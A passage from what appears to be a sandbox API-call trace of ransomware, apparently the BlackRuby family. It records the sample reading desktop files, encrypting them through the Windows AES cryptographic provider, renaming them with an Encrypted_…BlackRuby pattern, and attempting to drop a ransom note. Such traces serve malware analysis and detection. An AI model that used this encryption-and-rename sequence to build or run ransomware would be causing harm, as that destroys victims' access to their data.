[0057.028] GetLastError () returned 0x0 [0057.028] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\k_a3PIBx.pps", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\k_a3PIBx.pps", lpFilePart=0x0) returned 0x3a [0057.028] GetLastError () returned 0x0 [0057.028] SetErrorMode (uMode=0x1) returned 0x0 [0057.028] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\k_a3PIBx.pps" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\k_a3pibx.pps"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76a474a0, ftCreationTime.dwHighDateTime=0x1d35127, ftLastAccessTime.dwLowDateTime=0xa25c8cd0, ftLastAccessTime.dwHighDateTime=0x1d355f1, ftLastWriteTime.dwLowDateTime=0xa25c8cd0, ftLastWriteTime.dwHighDateTime=0x1d355f1, nFileSizeHigh=0x0, nFileSizeLow=0x167bd)) returned 1 [0057.028] GetLastError () returned 0x0 [0057.028] SetErrorMode (uMode=0x0) returned 0x1 [0057.028] CryptAcquireContextW (in: phProv=0x18ec74, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec74*=0x37c708) returned 1 [0057.029] GetLastError () returned 0x0 [0057.060] CryptImportKey (in: hProv=0x37c708, pbData=0x1c05774, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360aa0) returned 1 [0057.060] GetLastError () returned 0x0 [0057.060] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.060] GetLastError () returned 0x0 [0057.065] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.065] GetLastError () returned 0x0 [0057.065] CryptDuplicateKey (in: hKey=0x360aa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360f20) returned 1 [0057.065] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.066] GetLastError () returned 0x0 [0057.066] CryptSetKeyParam (hKey=0x360f20, dwParam=0x4, pbData=0x1c327c0*=0x1, dwFlags=0x0) returned 1 [0057.066] GetLastError () returned 0x0 [0057.066] CryptSetKeyParam (hKey=0x360f20, dwParam=0x1, pbData=0x1c3278c, dwFlags=0x0) returned 1 [0057.066] GetLastError () returned 0x0 [0057.066] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c008d0*, pdwDataLen=0x18ec9c*=0x168b0, dwBufLen=0x168b0 | out: pbData=0x2c008d0*, pdwDataLen=0x18ec9c*=0x168b0) returned 1 [0057.067] GetLastError () returned 0x0 [0057.067] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c3281c*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1c3281c*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0057.067] GetLastError () returned 0x0 [0057.067] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c3284c*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1c3284c*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0057.067] GetLastError () returned 0x0 [0057.071] CryptDestroyKey (hKey=0x360aa0) returned 1 [0057.071] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0057.071] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0057.071] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\k_a3PIBx.pps", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\k_a3PIBx.pps", lpFilePart=0x0) returned 0x3a [0057.071] GetLastError () returned 0x0 [0057.071] SetErrorMode (uMode=0x1) returned 0x0 [0057.071] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\k_a3PIBx.pps" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\k_a3pibx.pps"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.072] GetLastError () returned 0xb7 [0057.072] GetFileType (hFile=0x184) returned 0x1 [0057.072] SetErrorMode (uMode=0x0) returned 0x1 [0057.072] GetFileType (hFile=0x184) returned 0x1 [0057.074] CloseHandle (hObject=0x184) returned 1 [0057.074] GetLastError () returned 0xb7 [0057.074] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\k_a3PIBx.pps", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\k_a3PIBx.pps", lpFilePart=0x0) returned 0x3a [0057.074] GetLastError () returned 0xb7 [0057.074] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_SUNgaG5el3ttl60deZVdsyIpCnePtZPSIxXiUO9hlWu5E.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_SUNgaG5el3ttl60deZVdsyIpCnePtZPSIxXiUO9hlWu5E.BlackRuby", lpFilePart=0x0) returned 0x6f [0057.074] GetLastError () returned 0xb7 [0057.074] SetErrorMode (uMode=0x1) returned 0x0 [0057.074] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\k_a3PIBx.pps" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\k_a3pibx.pps"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76a474a0, ftCreationTime.dwHighDateTime=0x1d35127, ftLastAccessTime.dwLowDateTime=0xa25c8cd0, ftLastAccessTime.dwHighDateTime=0x1d355f1, ftLastWriteTime.dwLowDateTime=0x2a369720, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x168c0)) returned 1 [0057.074] GetLastError () returned 0xb7 [0057.074] SetErrorMode (uMode=0x0) returned 0x1 [0057.074] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\k_a3PIBx.pps" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\k_a3pibx.pps"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_SUNgaG5el3ttl60deZVdsyIpCnePtZPSIxXiUO9hlWu5E.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\encrypted_sungag5el3ttl60dezvdsyipcneptzpsixxiuo9hlwu5e.blackruby")) returned 1 [0057.075] GetLastError () returned 0xb7 [0057.075] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x46 [0057.075] GetLastError () returned 0xb7 [0057.075] SetErrorMode (uMode=0x1) returned 0x0 [0057.075] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0057.075] GetLastError () returned 0x5 [0057.076] SetErrorMode (uMode=0x0) returned 0x1 [0057.076] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Pw4RTCPYlJ.mkv", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Pw4RTCPYlJ.mkv", lpFilePart=0x0) returned 0x3c [0057.076] GetLastError () returned 0x5 [0057.076] SetErrorMode (uMode=0x1) returned 0x0 [0057.076] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Pw4RTCPYlJ.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\pw4rtcpylj.mkv"), fInfoLevelId=0x0, lpFileInformation=0x1c4fc00 | out: lpFileInformation=0x1c4fc00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacb14b40, ftCreationTime.dwHighDateTime=0x1d352a8, ftLastAccessTime.dwLowDateTime=0x359c0350, ftLastAccessTime.dwHighDateTime=0x1d34e30, ftLastWriteTime.dwLowDateTime=0x359c0350, ftLastWriteTime.dwHighDateTime=0x1d34e30, nFileSizeHigh=0x0, nFileSizeLow=0x18b52)) returned 1 [0057.076] GetLastError () returned 0x5 [0057.076] SetErrorMode (uMode=0x0) returned 0x1 [0057.076] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Pw4RTCPYlJ.mkv", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Pw4RTCPYlJ.mkv", lpFilePart=0x0) returned 0x3c [0057.076] GetLastError () returned 0x5 [0057.076] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Pw4RTCPYlJ.mkv", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Pw4RTCPYlJ.mkv", lpFilePart=0x0) returned 0x3c [0057.076] GetLastError () returned 0x5 [0057.076] SetErrorMode (uMode=0x1) returned 0x0 [0057.077] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Pw4RTCPYlJ.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\pw4rtcpylj.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.077] GetLastError () returned 0x0 [0057.077] GetFileType (hFile=0x184) returned 0x1 [0057.077] SetErrorMode (uMode=0x0) returned 0x1 [0057.077] GetFileType (hFile=0x184) returned 0x1 [0057.077] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x18b52 [0057.077] GetLastError () returned 0x0 [0057.077] ReadFile (in: hFile=0x184, lpBuffer=0x2c714d0, nNumberOfBytesToRead=0x18b52, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x2c714d0*, lpNumberOfBytesRead=0x18ecac*=0x18b52, lpOverlapped=0x0) returned 1 [0057.078] GetLastError () returned 0x0 [0057.078] CloseHandle (hObject=0x184) returned 1 [0057.078] GetLastError () returned 0x0 [0057.079] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Pw4RTCPYlJ.mkv", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Pw4RTCPYlJ.mkv", lpFilePart=0x0) returned 0x3c [0057.079] GetLastError () returned 0x0 [0057.079] SetErrorMode (uMode=0x1) returned 0x0 [0057.079] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Pw4RTCPYlJ.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\pw4rtcpylj.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacb14b40, ftCreationTime.dwHighDateTime=0x1d352a8, ftLastAccessTime.dwLowDateTime=0x359c0350, ftLastAccessTime.dwHighDateTime=0x1d34e30, ftLastWriteTime.dwLowDateTime=0x359c0350, ftLastWriteTime.dwHighDateTime=0x1d34e30, nFileSizeHigh=0x0, nFileSizeLow=0x18b52)) returned 1 [0057.079] GetLastError () returned 0x0 [0057.079] SetErrorMode (uMode=0x0) returned 0x1 [0057.089] CryptImportKey (in: hProv=0x37c818, pbData=0x1cabb04, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360b60) returned 1 [0057.089] GetLastError () returned 0x0 [0057.089] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.089] GetLastError () returned 0x0 [0057.094] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.094] GetLastError () returned 0x0 [0057.094] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360fa0) returned 1 [0057.094] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.094] GetLastError () returned 0x0 [0057.095] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x4, pbData=0x1cd8b50*=0x1, dwFlags=0x0) returned 1 [0057.095] GetLastError () returned 0x0 [0057.095] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x1, pbData=0x1cd8b1c, dwFlags=0x0) returned 1 [0057.095] GetLastError () returned 0x0 [0057.095] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2ca2cb0*, pdwDataLen=0x18ec9c*=0x18c50, dwBufLen=0x18c50 | out: pbData=0x2ca2cb0*, pdwDataLen=0x18ec9c*=0x18c50) returned 1 [0057.096] GetLastError () returned 0x0 [0057.096] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cd8bac*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1cd8bac*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0057.096] GetLastError () returned 0x0 [0057.096] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cd8bdc*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1cd8bdc*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0057.096] GetLastError () returned 0x0 [0057.098] CryptDestroyKey (hKey=0x360b60) returned 1 [0057.098] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.098] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0057.098] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Pw4RTCPYlJ.mkv", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Pw4RTCPYlJ.mkv", lpFilePart=0x0) returned 0x3c [0057.098] GetLastError () returned 0x0 [0057.098] SetErrorMode (uMode=0x1) returned 0x0 [0057.098] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Pw4RTCPYlJ.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\pw4rtcpylj.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.100] GetLastError () returned 0xb7 [0057.100] GetFileType (hFile=0x184) returned 0x1 [0057.100] GetFileType (hFile=0x184) returned 0x1 [0057.101] CloseHandle (hObject=0x184) returned 1 [0057.102] GetLastError () returned 0xb7 [0057.102] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Pw4RTCPYlJ.mkv", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Pw4RTCPYlJ.mkv", lpFilePart=0x0) returned 0x3c [0057.102] GetLastError () returned 0xb7 [0057.102] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_FLPtfJeT6faCDzVOnqhsPuiQRCmNjvnMTMZeVRp.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_FLPtfJeT6faCDzVOnqhsPuiQRCmNjvnMTMZeVRp.BlackRuby", lpFilePart=0x0) returned 0x69 [0057.102] GetLastError () returned 0xb7 [0057.102] SetErrorMode (uMode=0x1) returned 0x0 [0057.102] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Pw4RTCPYlJ.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\pw4rtcpylj.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacb14b40, ftCreationTime.dwHighDateTime=0x1d352a8, ftLastAccessTime.dwLowDateTime=0x359c0350, ftLastAccessTime.dwHighDateTime=0x1d34e30, ftLastWriteTime.dwLowDateTime=0x2a3b59e0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x18c60)) returned 1 [0057.102] GetLastError () returned 0xb7 [0057.102] SetErrorMode (uMode=0x0) returned 0x1 [0057.102] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Pw4RTCPYlJ.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\pw4rtcpylj.mkv"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\Encrypted_FLPtfJeT6faCDzVOnqhsPuiQRCmNjvnMTMZeVRp.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\encrypted_flptfjet6facdzvonqhspuiqrcmnjvnmtmzevrp.blackruby")) returned 1 [0057.102] GetLastError () returned 0xb7 [0057.103] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0057.103] GetLastError () returned 0x5 [0057.104] SetErrorMode (uMode=0x0) returned 0x1 [0057.104] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\RbkPHA.rtf", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\RbkPHA.rtf", lpFilePart=0x0) returned 0x38 [0057.104] GetLastError () returned 0x5 [0057.104] SetErrorMode (uMode=0x1) returned 0x0 [0057.104] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\RbkPHA.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\rbkpha.rtf"), fInfoLevelId=0x0, lpFileInformation=0x1cf5f88 | out: lpFileInformation=0x1cf5f88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c7bff0, ftCreationTime.dwHighDateTime=0x1d3570b, ftLastAccessTime.dwLowDateTime=0x273245c0, ftLastAccessTime.dwHighDateTime=0x1d34a0e, ftLastWriteTime.dwLowDateTime=0x273245c0, ftLastWriteTime.dwHighDateTime=0x1d34a0e, nFileSizeHigh=0x0, nFileSizeLow=0xddc8)) returned 1 [0057.104] GetLastError () returned 0x5 [0057.104] SetErrorMode (uMode=0x0) returned 0x1 [0057.105] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\RbkPHA.rtf", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\RbkPHA.rtf", lpFilePart=0x0) returned 0x38 [0057.105] GetLastError () returned 0x5 [0057.105] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\RbkPHA.rtf", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\RbkPHA.rtf", lpFilePart=0x0) returned 0x38 [0057.105] GetLastError () returned 0x5 [0057.105] SetErrorMode (uMode=0x1) returned 0x0 [0057.105] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\RbkPHA.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\rbkpha.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.105] GetLastError () returned 0x0 [0057.105] GetFileType (hFile=0x184) returned 0x1 [0057.105] SetErrorMode (uMode=0x0) returned 0x1 [0057.105] GetFileType (hFile=0x184) returned 0x1 [0057.105] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0xddc8 [0057.105] GetLastError () returned 0x0 [0057.105] ReadFile (in: hFile=0x184, lpBuffer=0x1cf7d14, nNumberOfBytesToRead=0xddc8, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1cf7d14*, lpNumberOfBytesRead=0x18ecac*=0xddc8, lpOverlapped=0x0) returned 1 [0057.106] GetLastError () returned 0x0 [0057.106] CloseHandle (hObject=0x184) returned 1 [0057.106] GetLastError () returned 0x0 [0057.106] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\RbkPHA.rtf", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\RbkPHA.rtf", lpFilePart=0x0) returned 0x38 [0057.106] GetLastError () returned 0x0 [0057.106] SetErrorMode (uMode=0x1) returned 0x0 [0057.106] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\RbkPHA.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\rbkpha.rtf"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c7bff0, ftCreationTime.dwHighDateTime=0x1d3570b, ftLastAccessTime.dwLowDateTime=0x273245c0, ftLastAccessTime.dwHighDateTime=0x1d34a0e, ftLastWriteTime.dwLowDateTime=0x273245c0, ftLastWriteTime.dwHighDateTime=0x1d34a0e, nFileSizeHigh=0x0, nFileSizeLow=0xddc8)) returned 1 [0057.106] GetLastError () returned 0x0 [0057.106] SetErrorMode (uMode=0x0) returned 0x1 [0057.106] CryptAcquireContextW (in: phProv=0x18ec74, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec74*=0x37c4e8) returned 1 [0057.106] GetLastError () returned 0x0 [0057.171] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1b7c61c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360aa0) returned 1 [0057.171] GetLastError () returned 0x0 [0057.171] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.171] GetLastError () returned 0x0 [0057.176] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.176] GetLastError () returned 0x0 [0057.176] CryptDuplicateKey (in: hKey=0x360aa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360e20) returned 1 [0057.176] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0057.176] GetLastError () returned 0x0 [0057.176] CryptSetKeyParam (hKey=0x360e20, dwParam=0x4, pbData=0x1ba9668*=0x1, dwFlags=0x0) returned 1 [0057.176] GetLastError () returned 0x0 [0057.176] CryptSetKeyParam (hKey=0x360e20, dwParam=0x1, pbData=0x1ba9634, dwFlags=0x0) returned 1 [0057.176] GetLastError () returned 0x0 [0057.176] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ba96b0*, pdwDataLen=0x18ec9c*=0xdec0, dwBufLen=0xdec0 | out: pbData=0x1ba96b0*, pdwDataLen=0x18ec9c*=0xdec0) returned 1 [0057.176] GetLastError () returned 0x0 [0057.176] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bc545c*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1bc545c*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0057.177] GetLastError () returned 0x0 [0057.177] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bc548c*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1bc548c*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0057.177] GetLastError () returned 0x0 [0057.180] CryptDestroyKey (hKey=0x360aa0) returned 1 [0057.180] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0057.180] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0057.180] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\RbkPHA.rtf", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\RbkPHA.rtf", lpFilePart=0x0) returned 0x38 [0057.180] GetLastError () returned 0x0 [0057.180] SetErrorMode (uMode=0x1) returned 0x0 [0057.180] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\RjdCg8l9\\RbkPHA.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\rjdcg8l9\\rbkpha.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0057.181] GetLastError () returned 0xb7 [0057.181] 